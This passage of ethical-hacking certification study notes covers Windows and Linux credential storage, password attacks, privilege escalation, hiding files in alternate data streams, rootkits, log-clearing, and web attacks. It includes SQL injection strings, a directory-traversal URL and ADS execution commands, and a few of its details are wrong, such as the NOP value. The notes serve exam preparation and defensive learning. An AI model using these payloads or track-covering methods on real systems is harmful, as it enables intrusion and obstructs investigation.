Methods](05-system_hacking.md#four-methods) 31 | - [Executing Applications](05-system_hacking.md#executing-applications) 32 | - [Hiding Files](05-system_hacking.md#hiding-files) 33 | - [ADS \(Alternate Data Stream\)](05-system_hacking.md#ads-alternate-data-stream) 34 | - [Attribute](05-system_hacking.md#attribute) 35 | - [Steganography](05-system_hacking.md#steganography) 36 | - [Rootkit](05-system_hacking.md#rootkit) 37 | - [Types of Rootkits](05-system_hacking.md#types-of-rootkits) 38 | - [Covering Tracks](05-system_hacking.md#covering-tracks) 39 | 40 | ## System Hacking 41 | 42 | ### Windows Security Architecture 43 | 44 | - Authentication credentials stored in SAM file 45 | - Older systems use LM hashing. Current uses NTLM v2 \(MD5\) 46 | - Windows network authentication uses Kerberos 47 | - **Security Context**: user identity and authentication information 48 | - **Security Identifier** \(SID\) - identifies a user, group or computer account 49 | - **Resource Identifier** \(RID\) - portion of the SID identifies a specific user, group or computer 50 | - The end of the SID indicates the user number 51 | - Example SID: S-1-5-21-3874928736-367528774-1298337465-**500** 52 | - **Administrator Account**: SID of 500 53 | - **Regular Accounts**: start with a SID of 1000 54 | - **SAM Database** \(Security Account Manager\) 55 | - File stores encrypted local passwords 56 | - Location: C:\Windows\System32\Config 57 | 58 | #### LM Hashing 59 | 60 | - Password is restricted to a maximum of 14 characters, converted to uppercase 61 | - The “fixed-length” password is split into two 7-byte halves 62 | - These values are used to create two DES keys, one from each 7-byte half, by converting the seven bytes into a bit stream with the most significant bit first, and inserting a null bit after every seven bits \(so 1010100 becomes 10101000\). This generates the 64 bits needed for a DES key 63 | - Each of the two keys is used to DES-encrypt the constant ASCII string `KGS!@#$%`, resulting in two 8-byte ciphertext values 64 | - Blank section hash: `AAD3B435B51404EE` 65 | - SAM file presents as `UserName:SID:LM_Hash:NTLM_Hash:::` 66 | 67 | #### Ntds.dit 68 | 69 | - Database file on a domain controller that stores passwords 70 | - Including the entire Active Directory 71 | - Location: `%SystemRoot%\NTDS\Ntds.dit` or `%SystemRoot%System32\Ntds.dit` 72 | 73 | #### Kerberos 74 | 75 | - Using both symmetric and asymmetric encryption 76 | - Steps of exchange: 77 | 1. Client asks **Key Distribution Center** \(KDC\) for a ticket. Sent in cleartext of user ID to **Authentication Server** \(AS\) \(Neither the secret key nor the password is sent to the AS\) 78 | 2. Server responds with **Ticket Granting Ticket** \(TGT\). This is a secret key which is hashed by the password copy stored on the server 79 | 3. If client can decrypt it, the TGT is sent back to the server requesting a **Ticket Granting Service** \(TGS\) service ticket 80 | 4. Server sends TGS service ticket which client uses to access resources 81 | - Tools: both take a long time to crack 82 | - KerbSniff 83 | - KerbCrack 84 | 85 | #### Registry 86 | 87 | - Collection of all settings and configurations make the system run 88 | - Made up of keys and values 89 | 90 | ##### Root Level Keys 91 | 92 | - **HKEY_LOCAL_MACHINE** \(HKLM\): information on hardware and software 93 | - **HKEY_CLASSES_ROOT** \(HKCR\): information on file associates and OLE classes 94 | - **HKEY_CURRENT_USER** \(HKCU\): profile information for the current user including preferences 95 | - **HKEY_USERS** \(HKU\): specific user configuration information for all currently active users 96 | - **HKEY_CURRENT_CONFIG** \(HKCC\): pointer to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current 97 | 98 | ##### Types of Registry Values 99 | 100 | - **REG_SZ**: character string 101 | - **REG_EXPAND_SZ**: expandable string value 102 | - **REG_BINARY**: a binary value 103 | - **REG_DWORD**: 32-bit unsigned integer 104 | - **REG_LINK**: symbolic link to another key 105 | 106 | ##### Important Locations 107 | 108 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 109 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices 110 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 111 | - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run \(run app as soon as user logs in\) 112 | 113 | ##### Executables 114 | 115 | - regedit.exe 116 | - regedt32.exe \(preferred by Microsoft\) 117 | 118 | #### MMC \(Microsoft Management Console\) 119 | 120 | - Used by Windows to administer system 121 | - "snap-ins" that allow you to modify sets, such as Group Policy Editor 122 | 123 | #### Null session 124 | 125 | - Anonymous connection to an inter-process communication \(IPC\) network service 126 | - NetBIOS is vulnerable to it 127 | - **Countermeasure**: create restrict anonymous registry key 128 | 129 | ### Linux Security Architecture 130 | 131 | - Linux Systems use User IDs \(UID\) and Group IDs \(GID\), found in `/etc/passwd` 132 | - Root has UID and GID of 0 133 | - First user has UID and GID of 500 134 | - Password are stored in `/etc/shadow` for most current systems 135 | - `/etc/password` stores passwords in hashes 136 | - `/etc/shadow` stores passwords encrypted \(hashed and salted\) and is only accessible by root 137 | 138 | #### Important Directories 139 | 140 | | Directory | Description | 141 | | :-------- | :------------------------------------------------------------------------------ | 142 | | / | Root directory | 143 | | /home | Holds the user home directories | 144 | | /etc | All administration files and passwords. Both password and shadow files are here | 145 | | /usr | Holds almost all the information, commands and files unique to the users | 146 | | /mnt | Holds the access locations you've mounted | 147 | | /bin | Basic Linux commands | 148 | | /sbin | Yystem binaries folder which holds more administrative commands | 149 | | /dev | Contains pointer locations to various storage and input/output systems | 150 | 151 | #### Important Linux Commands 152 | 153 | | Command | Description | 154 | | :------- | :-------------------------------------------------------------------------------------- | 155 | | adduser | Add a user to the system | 156 | | cat | Display contents of file | 157 | | cp | Copy | 158 | | ifconfig | Display network configuration information | 159 | | kill | Kill a running process | 160 | | ls | Display the contents of a folder. -l option provides most information. | 161 | | man | Display the manual page for a command | 162 | | passwd | Used to change password | 163 | | ps | Process status. -ef option shows all processes | 164 | | rm | Remove files. -r option recursively removes all subdirectories | 165 | | su | Allow you to perform functions as another user \(super user\) | 166 | | pwd | Display current directory | 167 | | chmod | Change permissions of a folder or file | 168 | | | `Read` 4 \(100\), `Write` 2 \(010\), `Execute` 1 \(001\) | 169 | | | `777`: Three 7s in order stand for `user`, `group`, and `others`, result is `rwxrwxrwx` | 170 | 171 | - Adding an ampersand `&` after a process name indicates it should run in the background 172 | - Linux Enumeration Commands 173 | - **finger**: info on user and host machine 174 | - **rpcinfo and rpcclient**: info on RPC in the environment 175 | - **showmount**: displays all shared directories on the machine 176 | 177 | ### System Hacking Goals 178 | 179 | - **Gaining Access**: using information gathered to exploit the system 180 | - **Escalating Privileges**: granting hacked account as admin or pivots to an admin account 181 | - **Executing Applications**: putting back doors into the system to maintain access 182 | - **Hiding Files**: making sure the files left behind are not discoverable 183 | - **Covering Tracks**: cleaning up everything else \(log files, etc.\) 184 | 185 | ### Authentication and Password 186 | 187 | - **Strength of passwords** 188 | - Determined by length and complexity 189 | - Complexity is defined by number of character sets used \(lower case, upper case, numbers, symbols, etc.\) 190 | - **Default passwords** 191 | - Always should be changed and never leave what they came with 192 | - Databases such as cirt.net, default-password.info and open-sez.me all have databases of these 193 | 194 | #### Three Types of Authentication 195 | 196 | - **Something You Are** 197 | - **Active**: interaction required \(retina scan or fingerprint scanner\) 198 | - **Passive**: no interaction required \(iris scan\) 199 | - uses biometrics to validate identity \(retina, fingerprint, etc.\), downside: a lot of false negatives 200 | - **False acceptance rate** \(FAR\) - rate that a system accepts access for people that shouldn't have it 201 | - **False rejection rate** \(FRR\) - rate that a system rejects access for someone who should have it 202 | - **Crossover error rate** \(CER\) - combination of the two; the lower the CER, the better the system 203 | - **Something You Have** 204 | - Usually consists of a token of some kind \(swipe badge, ATM card, etc.\) 205 | - This type usually requires something alongside it \(such as a PIN for an ATM card\) 206 | - Some tokens are single-factor \(such as a plug-and-play authentication\) 207 | - **Something You Know**: better known as a password 208 | - **2FA** \(Two-Factor Authentication\): when you have two types of authentication such as something you know \(password\) and something you have \(access card\) 209 | 210 | #### Types of Password Attacks 211 | 212 | ##### Non-electronic 213 | 214 | - Social engineering attacks, most effective 215 | 216 | ##### Active online 217 | 218 | - Done by directly communicating with the victim's machine 219 | - Active online attacks are easier to detect and take a longer time 220 | - Including dictionary and brute-force attacks, hash injections, phishing, Trojans, spyware, keyloggers and password guessing 221 | - **Keylogging**: process of using a hardware device or software application to capture keystrokes of a user 222 | - **LLMNR/NBT-NS** 223 | - Attack based off Windows technologies that caches DNS locally 224 | - Responding to these poisoned local cache, sends over an NTLM v2 hash, it can be sniffed out and then cracked 225 | - Tools 226 | - NBNSpoof 227 | - Metasploit 228 | - Responder 229 | - Can combine `net` commands with a tool such as **NetBIOS Auditing tool** or **Legion** to automate the testing of user IDs and passwords 230 | - Tools 231 | - Hydra 232 | - Metasploit 233 | 234 | ##### Passive online 235 | 236 | - Sniffing the wire in hopes of intercepting a password in clear text or attempting a replay attack or man-in-the-middle attack 237 | - Tools 238 | - Cain and Abel: can poison ARP and then monitor the victim's traffic 239 | - Ettercap: works very similar to Cain and Abel. However, can also help against SSL encryption 240 | 241 | ##### Offline 242 | 243 | - When the hacker steals a copy of the password file and does the cracking on a separate system 244 | - **Dictionary Attack**: using a word list to attack the password, the fastest method of attacking 245 | - **Brute force Attack** 246 | - Tries every combination of characters to crack a password 247 | - Can be faster if you know parameters \(such as at least 7 characters, should have a special character, etc.\) 248 | - **Rule-based Attack**: attacker obtains some information about the password 249 | - **Hybrid Attack**: taking a dictionary attack and replaces characters \(such as a 0 for an o\) or adds numbers to the end 250 | - **Syllable Attack**: when passwords are not known words, attackers use the dictionary and other methods to crash them, as well as all possible dominations of them 251 | - **Rainbow tables**: using pre-hashed passwords to compare against a password hash. Is faster because the hashes are already computed 252 | - **Distributed Network Attack** \(DNA\): recovering password protected files that uses unused processing power of machines across the network to decrypt passwords 253 | - Tools 254 | - Cain 255 | - John the Ripper 256 | 257 | ### Privilege Escalation 258 | 259 | #### Types of Privilege Escalation 260 | 261 | - **Vertical**: lower-level user executes code at a higher privilege level 262 | - **Horizontal**: executing code at the same user level but from a location that would be protected from that access 263 | 264 | #### Four Methods 265 | 266 | 1. Crack the password of an admin, primary aim 267 | 2. Take advantage of an OS vulnerability 268 | - **DLL Hijacking**: replacing a DLL in the application directory with your own version which gives you the access you need 269 | 3. Use a tool that will provide you the access such as Metasploit 270 | 4. Social engineering a user to run an application 271 | 272 | ### Executing Applications 273 | 274 | - Executing things such as keyloggers, spyware, back doors and crackers 275 | - ECC refers executing applications as owning a system 276 | 277 | ### Hiding Files 278 | 279 | #### ADS \(Alternate Data Stream\) 280 | 281 | - Works only on Windows 282 | - Hides a file from directory listing on an NTFS file system 283 | - Can be run by `start readme.txt:badfile.exe` 284 | - Can also create a link to this and make it look real: `mklink innocent.exe readme.txt:badfile.exe` 285 | - **Countermeasures** 286 | - Show ADS: `dir /r` 287 | - Blow away all ADS by copying files to a FAT partition 288 | - Every forensic kit looks for this 289 | 290 | #### Attribute 291 | 292 | - In Windows: `attrib +h filename` 293 | - In Linux: simply add a dot `.` to the beginning of the filename 294 | 295 | #### Steganography 296 | 297 | - Steganography can hide data and files, more details in `./11-Cryptography.md` 298 | 299 | #### Rootkit 300 | 301 | - Software puts in place by attacker to obscure system compromise 302 | - Hiding processes and files 303 | - Also allowing for future access 304 | - Examples: 305 | - Horsepill: Linus kernel rootkit inside initrd 306 | - Grayfish: Windows rootkit that injects in boot record 307 | - Azazel 308 | - Avatar 309 | - Necurs 310 | - ZeroAccess 311 | - One way to detect rootkits is to map all the files on a system and then boot a system from a clean CD version and compare the two file systems 312 | 313 | ##### Types of Rootkits 314 | 315 | - **Hypervisor level**: rootkits that modify the boot sequence of a host system to load a VM as the host OS 316 | - **Hardware level**: hiding malware in devices or firmware 317 | - **Boot loader level**: replacing boot loader with one controlled by hacker 318 | - **Application level**: directed to replace valid application files with Trojans 319 | - **Kernel level**: attacking boot sectors \(MBR: Master Boot Record\) and kernel level replacing kernel code with back-door code; most dangerous 320 | - **Library level**: using system-level calls to hide themselves 321 | 322 | ### Covering Tracks 323 | 324 | - Don't just delete, key sign that an attack has happened. Option is to corrupt a log file, because this can happen all the time. 325 | - Best option is to be selective and delete the entries pertaining to your actions 326 | - Also disabling auditing ahead of time to prevent logs from being captured 327 | - In Windows: need to clear application, system and security logs; Tool Elsave can clear Windows logs 328 | - In Windows: clear MRU \(Most Recent Used\) list 329 | - **clearev**: meterpreter shell command to clear log files 330 | - **Time stomping**: manipulating time stamps on files, used to set file times which to throw off investigations or identify intrusions 331 | -------------------------------------------------------------------------------- /06-web_server_and_web_application_hacking.md: -------------------------------------------------------------------------------- 1 | # 06-Web Server and Web Application Hacking 2 | 3 | ## Table of Contents 4 | 5 | - [Web Server and Web Application Hacking](06-web_server_and_web_application_hacking.md#web-server-and-web-application-hacking) 6 | - [Web Organizations](06-web_server_and_web_application_hacking.md#web-organizations) 7 | - [OWASP Web Top 10 Application Security Risks 2017](06-web_server_and_web_application_hacking.md#owasp-web-top-10-application-security-risks-2017) 8 | - [Web Server Architecture](06-web_server_and_web_application_hacking.md#web-server-architecture) 9 | - [Technology Stacks](06-web_server_and_web_application_hacking.md#technology-stacks) 10 | - [Web Server Attack Methodology](06-web_server_and_web_application_hacking.md#web-server-attack-methodology) 11 | - [Web Server and Application Attacks](06-web_server_and_web_application_hacking.md#web-server-and-application-attacks) 12 | - [Injections](06-web_server_and_web_application_hacking.md#injections) 13 | - [File Injection](06-web_server_and_web_application_hacking.md#file-injection) 14 | - [Command Injection](06-web_server_and_web_application_hacking.md#command-injection) 15 | - [LDAP Injection](06-web_server_and_web_application_hacking.md#ldap-injection) 16 | - [SOAP Injection](06-web_server_and_web_application_hacking.md#soap-injection) 17 | - [SQL Injection](06-web_server_and_web_application_hacking.md#sql-injection) 18 | - [XSS \(Cross-site scripting\)](06-web_server_and_web_application_hacking.md#xss-cross-site-scripting) 19 | - [CSRF \(Cross-Site Request Forgery\)](06-web_server_and_web_application_hacking.md#csrf-cross-site-request-forgery) 20 | - [Clickjacking](06-web_server_and_web_application_hacking.md#clickjacking) 21 | - [Buffer Overflow \(Smashing the stack\)](06-web_server_and_web_application_hacking.md#buffer-overflow-smashing-the-stack) 22 | - [Other attacks](06-web_server_and_web_application_hacking.md#other-attacks) 23 | 24 | ## Web Server and Web Application Hacking 25 | 26 | ### Web Organizations 27 | 28 | - **Web 2.0**: dynamic applications; have a larger attack surface due to simultaneous communication 29 | - **Internet Engineering Task Force** \(IETF\): creating engineering documents to help make the Internet work better 30 | - **World Wide Web Consortium** \(W3C\): a standards-developing community 31 | - **Open Web Application Security Project** \(OWASP\): an organization focused on improving the security of software 32 | - **WebGoat**: project maintained by OWASP which is an insecure web application meant to be tested 33 | 34 | ### OWASP Web Top 10 Application Security Risks 2017 35 | 36 | - **A1 Injection Flaws**: SQL, OS and LDAP injection 37 | - **A2 Broken Authentication and Session Management**: functions related to authentication and session management that aren't implemented correctly 38 | - **A3 Sensitive Data Exposure**: not properly protecting sensitive data \(SSN, CC numbers, etc.\) 39 | - **A4 XML External Entities \(XXE\)**: exploiting XML processors by uploading hostile content in an XML document 40 | - **A5 Broken Access Control**: having improper controls on areas that should be protected 41 | - **A6 Security Misconfiguration**: across all parts of the server and application 42 | - **A7 Cross-Site Scripting \(XSS\)**: taking untrusted data and sending it without input validation 43 | - **A8 Insecure Deserialization**: improperly de-serializing data 44 | - **A9 Using Components with Known Vulnerabilities**: libraries and frameworks that have known security holes 45 | - **A10 Insufficient Logging and Monitoring**: not having enough logging to detect attacks 46 | 47 | ### Web Server Architecture 48 | 49 | - **Most Popular Servers**: Apache, IIS and Nginx 50 | - Apache runs configurations as a part of a module within special files \(http.conf, etc.\) 51 | - IIS runs all applications in the context of LOCAL_SYSTEM 52 | - IIS 5 had a ton of bugs - easy to get into 53 | - **N-Tier Architecture**: distributing processes across multiple servers; normally as three-tier: Presentation \(web\), logic \(application\) and data \(database\) 54 | - **Error Reporting**: should not be showing errors in production; easy to glean information 55 | - **HTML**: markup language used to display web pages 56 | - **HTTP Request Methods** 57 | - **GET**: retrieving whatever information is in the URL; sending data is done in URL 58 | - **HEAD**: identical to get except for no body return 59 | - **POST**: sending data via body - data not shown in URL or in history 60 | - **PUT**: requesting data be stored at the URL 61 | - **DELETE**: requesting origin server delete resource 62 | - **TRACE**: requesting application layer loopback of message 63 | - **CONNECT**: reserved for use with proxy 64 | - **HTTP Error Messages** 65 | - **1xx: Informational**: request received, continuing 66 | - **2xx: Success**: action received, understood and accepted 67 | - **3xx: Redirection**: further action must be taken 68 | - **4xx: Client Error**: request contains bad syntax or cannot be fulfilled 69 | - **5xx: Server Error**: server failed to fulfill an apparently valid request 70 | 71 | #### Technology Stacks 72 | 73 | | Stack Layer | Service | Technic | 74 | | :---------- | :---------------------- | :--------------------- | 75 | | 7 | Custom Web Applications | Business Logic | 76 | | 6 | Third Party Components | Open Source/Commercial | 77 | | 5 | Web Server | Apache/MS IIS | 78 | | 4 | Database | Oracle/MySQL/MS SQL | 79 | | 3 | Operating System | Windows/Linux/OS X | 80 | | 2 | Network | Router/Switch | 81 | | 1 | Security | IPS/IDS | 82 | 83 | ### Web Server Attack Methodology 84 | 85 | - **Information Gathering**: Internet searches, whois, reviewing robots.txt 86 | - **Web Server Footprinting**: banner grabbing 87 | - nmap 88 | - Detect vulnerable TRACE method: `nmap --script http-trace -p80 localhost` 89 | - List email addresses: `nmap --script http-google-email ` 90 | - Discover virtual hosts on same IP address you're footprinting, `*` is online db such as IP2Hosts: `nmap --script hostmap-_* ` 91 | - Enumerate common web apps: `nmap --script http-enum -p80 ` 92 | - Grab robots.txt: `nmap -p80 --script http-robots.txt ` 93 | - Find out what options are supported by an HTTP server: `nmap --script http-methods ` 94 | - Other tools 95 | - Netcraft 96 | - HTTPRecon 97 | - ID Serve 98 | - HTTPrint 99 | - **Website Mirroring** 100 | - Bringing the site to your own machine to examine structure, etc. 101 | - Tools 102 | - Wget 103 | - BlackWidow 104 | - HTTrack 105 | - WebCopier 106 | - SurfOffline 107 | - **Vulnerability Scanning** 108 | - Scanning web server for vulnerabilities 109 | - Tools 110 | - Nessus 111 | - Nikto: specifically suited for web servers; still very noisy like Nessus; scan files and vulnerable CGIs 112 | - **Session Hijacking** 113 | - **Web Server Password Cracking** 114 | 115 | ### Web Server and Application Attacks 116 | 117 | - Most often hacked before of inherent weaknesses built into the program 118 | - First step is to identify entry points \(POST data, URL parameters, cookies, headers, etc.\) 119 | - Tools 120 | - WebScarab: provided by OWASP 121 | - Burp Suite 122 | - httprint 123 | - **Cookies**: 124 | - Small text-based files stored that contains information like preferences, session details or shopping cart contents 125 | - Can be manipulated to change functionality \(e.g. changing a cooking that says "ADMIN=no" to "yes"\) 126 | - Sometimes, but rarely, can also contain passwords 127 | - **DNS Amplification**: uses recursive DNS to DoS a target; amplifies DNS answers to target until it can't do anything 128 | - **Directory Transversal** \(../ or dot-dot-slash\) 129 | - Example: `http://www.example.com/../../../../etc/password` 130 | - File requested that should not be accessible from web server 131 | - Using Unicode to possibly evade IDS: `%2e` for dot and `%sf` for slash 132 | - **Parameter Tampering** \(URL Tampering\): manipulating parameters within URL to achieve escalation or other changes 133 | - **Hidden Field Tampering**: modifying hidden form fields producing unintended results 134 | - **Web Cache Poisoning**: replacing the cache on a box with a malicious version of it 135 | - **Wfetch**: Microsoft tool that allows you to craft HTTP requests to see response data 136 | - **Misconfiguration Attack**: improper configuration of a web server 137 | - **Password Attack**: attempting to crack passwords related to web resources 138 | - **Connection String Parameter Pollution**: injection attack that uses semicolons to take advantage of databases that use this separation method 139 | - **Web Defacement**: simply modifying a web page to say something else 140 | - **Shellshock** 141 | - Causes Bash to unintentionally executing commands when commands are concatenated on the end of function definitions 142 | - RCE via Apache CGI Script 143 | - Tools 144 | - Brutus: brute force web passwords of HTTP 145 | - Hydra: network login cracker 146 | - Metasploit 147 | - Exploits hold the actual exploit 148 | - Payload contains the arbitrary code if exploit is successful 149 | - Auxiliary used for one-off actions \(like a scan\) 150 | - NOPS used for buffer-overflow type operations 151 | 152 | #### Injections 153 | 154 | ##### File Injection 155 | 156 | - Attacker injects a pointer in a web form to an exploit hosted elsewhere 157 | 158 | ##### Command Injection 159 | 160 | - Attacker gains shell access using Java or similar 161 | 162 | ##### LDAP Injection 163 | 164 | - Attacker exploits applications that construct LDAP statements 165 | - Format for LDAP injection including `)(&)` 166 | 167 | ##### SOAP Injection 168 | 169 | - Injecting query strings in order to bypass authentication 170 | - Using XML to format information 171 | - Messages are one way in nature 172 | 173 | ##### SQL Injection 174 | 175 | - Injecting SQL commands into input fields to produce output 176 | - Double dash \(--\) tells the server to ignore the rest of the query: `' OR 1 = 1 --`, basically tells the server if 1 = 1 \(always true\) 177 | - Basic test to see if SQL injection is possible is just inserting a single quote `'` 178 | - **In-band SQL injection**: using same communication channel to perform attack 179 | 180 | - **Error-based SQL Injection**: most common used, inserting bad input to get database-level error message 181 | - System stored procedure 182 | - Illegal/Logically incorrect query: `SELECT * FROM users WHERE name='bob"' AND password =`, gets `'Unclosed quotation mark after sting " AND password='xxx"."` 183 | - **UNION SQL Injection**: most common used, using `UNION` clause to append a malicious query 184 | - **Tautology**: using always true statements to test SQL \(e.g. 1=1\) 185 | 186 | A **End of Line Comment**: writing a line of code that ends in comment `--` 187 | 188 | `SELECT * FROM users WHERE name='admin'--' AND password = 'password'` 189 | 190 | - **Inline Comment**: using in-line comment `/* */` 191 | - **Piggybacked Query**: using semicolon `;` to add malicious query after original query 192 | 193 | - **Out-of-band SQL injection**: using different communication channels \(e.g. export results to file on web server\) 194 | - **Blind/inferential SQL injection**: error messages and screen returns don't occur, usually have to guess whether command work or use timing to know 195 | - Time delay: inserting wait function for delay 196 | - Boolean exploitation: manipulating valid statements that evaluate to true and false in HTTP request parameter 197 | - `https://example.com/item.aspx?id=67 and 1=2` gets SQL query `SELECT * FROM items WHERE ID=67 AND 1=2`, if vulnerable to SQL injection, no item will show 198 | - `https://example.com/item.aspx?id=67 and 1=1` gets SQL query `SELECT * FROM items WHERE ID=67 AND 1=1`, if vulnerable to SQL injection, item 67 will show 199 | - Heavy query: in case it's impossible to use time delay function in query, generates heavy queries instead 200 | - **MS SQL Server injection**: running commands from SQL shell by using `xp_cmdshell` 201 | - **Countermeasures** 202 | - To counter **Database server runs OS commands** 203 | - Running database service account with minimal rights 204 | - Disabling commands like xp_cmdshell 205 | - To counter **Using privileged account to connect to database** 206 | - Monitoring DB traffic using an IDS, WAP 207 | - Using low privileged account for DB connection 208 | - To counter **Error message revealing important information** 209 | - Suppressing all error messages 210 | - Using custom error messages 211 | - To counter **No Data validation at the server** 212 | - Filtering all client Data 213 | - Sanitizing Data 214 | - Tools 215 | - Sqlmap 216 | - sqlninja 217 | 218 | #### XSS \(Cross-site scripting\) 219 | 220 | - Inputting JavaScript into a web form alters what the page does 221 | - Can also be passed via URL `http://IPADDRESS/";!--"=&{()}` 222 | - Can be malicious by accessing cookies and sending them to a remote host 223 | - Can be mitigated by setting **HttpOnly** flag for cookies 224 | - **DOM Based XSS** (Type 0): a form of XSS where the entire tainted data flow from source to sink takes place in the browser, and the data flow never leaves the browser. e.g.: the URL of the page or an element of HTML... 225 | - **Stored XSS** (Persistent or Type I): stores the XSS in a forum or like on the target server, for multiple people to access 226 | - **Reflected XSS** (Non-persistent or Type II): occurs when user input is immediately returned by a web application, without permanently storing the user provided data 227 | 228 | #### CSRF \(Cross-Site Request Forgery\) 229 | 230 | - Forcing an end user to execute unwanted actions on an app they're already authenticated on 231 | - Inheriting identity and privileges of victim to perform an undesired function on victim's behalf 232 | - Capturing the session and sends a request based off the logged in user's credentials 233 | - Can be mitigated by sending **random challenge tokens** 234 | 235 | #### Clickjacking 236 | 237 | - Also known as a user interface redress attack 238 | - Used to trick web users to click something different from what they think they are clinking 239 | 240 | #### Buffer Overflow \(Smashing the stack\) 241 | 242 | - Attempting to write data into application's buffer area to overwrite adjacent memory, execute code or crash a system 243 | - Inputting more data than the buffer is allowed 244 | - Including stack, heap, NOP sleds \(hex value 0x09\) and more 245 | 246 | #### Other attacks 247 | 248 | - **Session Fixation**: attacker logs into a legitimate site and pulls a session ID, then sends link with session ID to victim. Once victim logs in, attacker can now log in and run with user's credentials 249 | - **Fuzzing**: inputting random data into a target to see what will happen 250 | - **HTTP Response Splitting** 251 | - Adding header response data to an input field so server splits the response 252 | - It's not an attack by itself, so it must be combined with another attack 253 | - Can be used to redirect a user to a malicious site 254 | - **CSPP** \(Connection Stream Parameter Pollution\): polluting connection strings between the Web application authenticating a user to the database, for example, by injecting phony parameters into the connection strings using semicolons as separators 255 | -------------------------------------------------------------------------------- /07-wireless_network_hacking.md: -------------------------------------------------------------------------------- 1 | # 07-Wireless Network Hacking 2 | 3 | ## Table of Contents 4 | 5 | - [Wireless Network Hacking](07-wireless_network_hacking.md#wireless-network-hacking) 6 | - [Wireless Terminologies](07-wireless_network_hacking.md#wireless-terminologies) 7 | - [Types of Wireless Authentication Model](07-wireless_network_hacking.md#types-of-wireless-authentication-model) 8 | - [Types of Wireless Antennas](07-wireless_network_hacking.md#types-of-wireless-antennas) 9 | - [Wireless Standards](07-wireless_network_hacking.md#wireless-standards) 10 | - [How to remember all 802.11x standards](07-wireless_network_hacking.md#how-to-remember-all-80211x-standards) 11 | - [Wireless Encryption](07-wireless_network_hacking.md#wireless-encryption) 12 | - [WEP \(Wired Equivalent Privacy\)](07-wireless_network_hacking.md#wep-wired-equivalent-privacy) 13 | - [IV \(Initialization Vector\)](07-wireless_network_hacking.md#iv-initialization-vector) 14 | - [WPA/WPA2 \(Wi-Fi Protected Access\)](07-wireless_network_hacking.md#wpawpa2-wi-fi-protected-access) 15 | - [Wireless Hacking Threats](07-wireless_network_hacking.md#wireless-hacking-threats) 16 | - [Wireless Attacks](07-wireless_network_hacking.md#wireless-attacks) 17 | - [Rogue Access Point](07-wireless_network_hacking.md#rogue-access-point) 18 | - [Evil Twin](07-wireless_network_hacking.md#evil-twin) 19 | - [Honeypot AP Attack](07-wireless_network_hacking.md#honeypot-ap-attack) 20 | - [Ad Hoc Connection Attack](07-wireless_network_hacking.md#ad-hoc-connection-attack) 21 | - [DoS Attack](07-wireless_network_hacking.md#dos-attack) 22 | - [MAC Filter](07-wireless_network_hacking.md#mac-filter) 23 | - [Wireless Hacking Methodology](07-wireless_network_hacking.md#wireless-hacking-methodology) 24 | - [Network Discovery](07-wireless_network_hacking.md#network-discovery) 25 | - [GPS Mapping](07-wireless_network_hacking.md#gps-mapping) 26 | - [Wireless Traffic Analysis](07-wireless_network_hacking.md#wireless-traffic-analysis) 27 | - [Tools](07-wireless_network_hacking.md#tools) 28 | - [Wireless Encryption Cracking](07-wireless_network_hacking.md#wireless-encryption-cracking) 29 | - [WEP Cracking](07-wireless_network_hacking.md#wep-cracking) 30 | - [WPA Cracking](07-wireless_network_hacking.md#wpa-cracking) 31 | - [Bluetooth Hacking](07-wireless_network_hacking.md#bluetooth-hacking) 32 | - [Bluetooth Modes](07-wireless_network_hacking.md#bluetooth-modes) 33 | - [Bluetooth Attacks](07-wireless_network_hacking.md#bluetooth-attacks) 34 | 35 | ## Wireless Network Hacking 36 | 37 | ### Wireless Terminologies 38 | 39 | - **Access Point** \(AP\): used to connect wireless devices to a wireless/wired network 40 | - **Association**: process of connecting a wireless device to an AP 41 | - **Service Set Identifier** \(SSID\) 42 | - 32 char unique wireless identifier given to WLAN 43 | - Can be hidden, but provides no security 44 | - **Orthogonal Frequency-Division Multiplexing** \(OFDM\): carrying waves in various channels 45 | - **Multiple input, Multiple output OFDM** \(MIMO-OFDM\): influencing spectral efficiency of 4G and 5G services 46 | - **Direct-Sequence Spread Spectrum** \(DSSS\): combining all available waveforms into a single purpose 47 | - **Frequency-hopping Spread Spectrum** \(FHSS\): also known as FH-CDMA, transmitting radio signals by rapidly switching a carrier among many frequency channels 48 | - **Basic Service Set** \(BSS\): communication between a single AP and its clients 49 | - **Basic Service Set Identifier** \(BSSID\): MAC address of the wireless access point 50 | - **ISM Band**: a set of frequencies for international industrial, scientific, and medical communities 51 | - **Spectrum Analyzer**: verifying wireless quality, detecting rogue access points and detects attacks, Wireless Intrusion Prevention System \(WIPS\) is also capable of searching for and locating rogue access points 52 | - **2 types of wireless networks**: Ad hoc \(no access point\) and Infrastructure 53 | - **LEAP**: proprietary version of EAP developed by Cisco 54 | - **PEAP**: protocol that encapsulates EAP within TLS tunnel 55 | 56 | #### Types of Wireless Authentication Model 57 | 58 | - **Open System**: no authentication 59 | - **Shared Key Authentication**: authentication through a shared key/password 60 | - **Centralized Authentication**: authentication through something like RADIUS \(Remote Authentication Dial-In User Service\) 61 | 62 | #### Types of Wireless Antennas 63 | 64 | - **Directional Antenna**: **uni**directional antenna, signals in one direction, eg: Yagi Uda antenna 65 | - **Omnidirectional Antenna**: signals in all directions 66 | - **Parabolic Grid Antenna**: a semi-dish in form of grid, long-distance Wi-Fi transmissions by making highly focused radio beams 67 | - **Dipole Antenna**: also called doublet, is bilaterally symmetrical balanced antenna, feeds on a balanced parallel-wire RF transmission line 68 | - **Reflector Antenna**: used to concentrate EM energy that radiated or received at a focal point 69 | 70 | ### Wireless Standards 71 | 72 | | Standard | Speed \(Mbps\) | Freq. \(GHz\) | Modulation Type | Range \(Meters\) | 73 | | :----------------- | :------------- | :------------ | :-------------------- | :--------------- | 74 | | 802.11 | 1, 2 | 2.4 | DSSS, FHSS | 20-100 | 75 | | 802.11a | 54 | 5 | OFDM | 35-100 | 76 | | 802.11b | 11 | 2.4 | DSSS | 35-140 | 77 | | 802.11g | 54 | 2.4 | OFDM | 38-140 | 78 | | 802.11n | 54-600 | 2.4, 5 | MIMO-OFDM | 70-250 | 79 | | 802.15.1 Bluetooth | 25-50 | 2.4 | GFSK, π/4-DPSK, 8DPSK | 10-240 | 80 | | 802.15.4 Zigbee | 0.25 | 2.4 | O-QPSK, GFSK, BPSK | 1-100 | 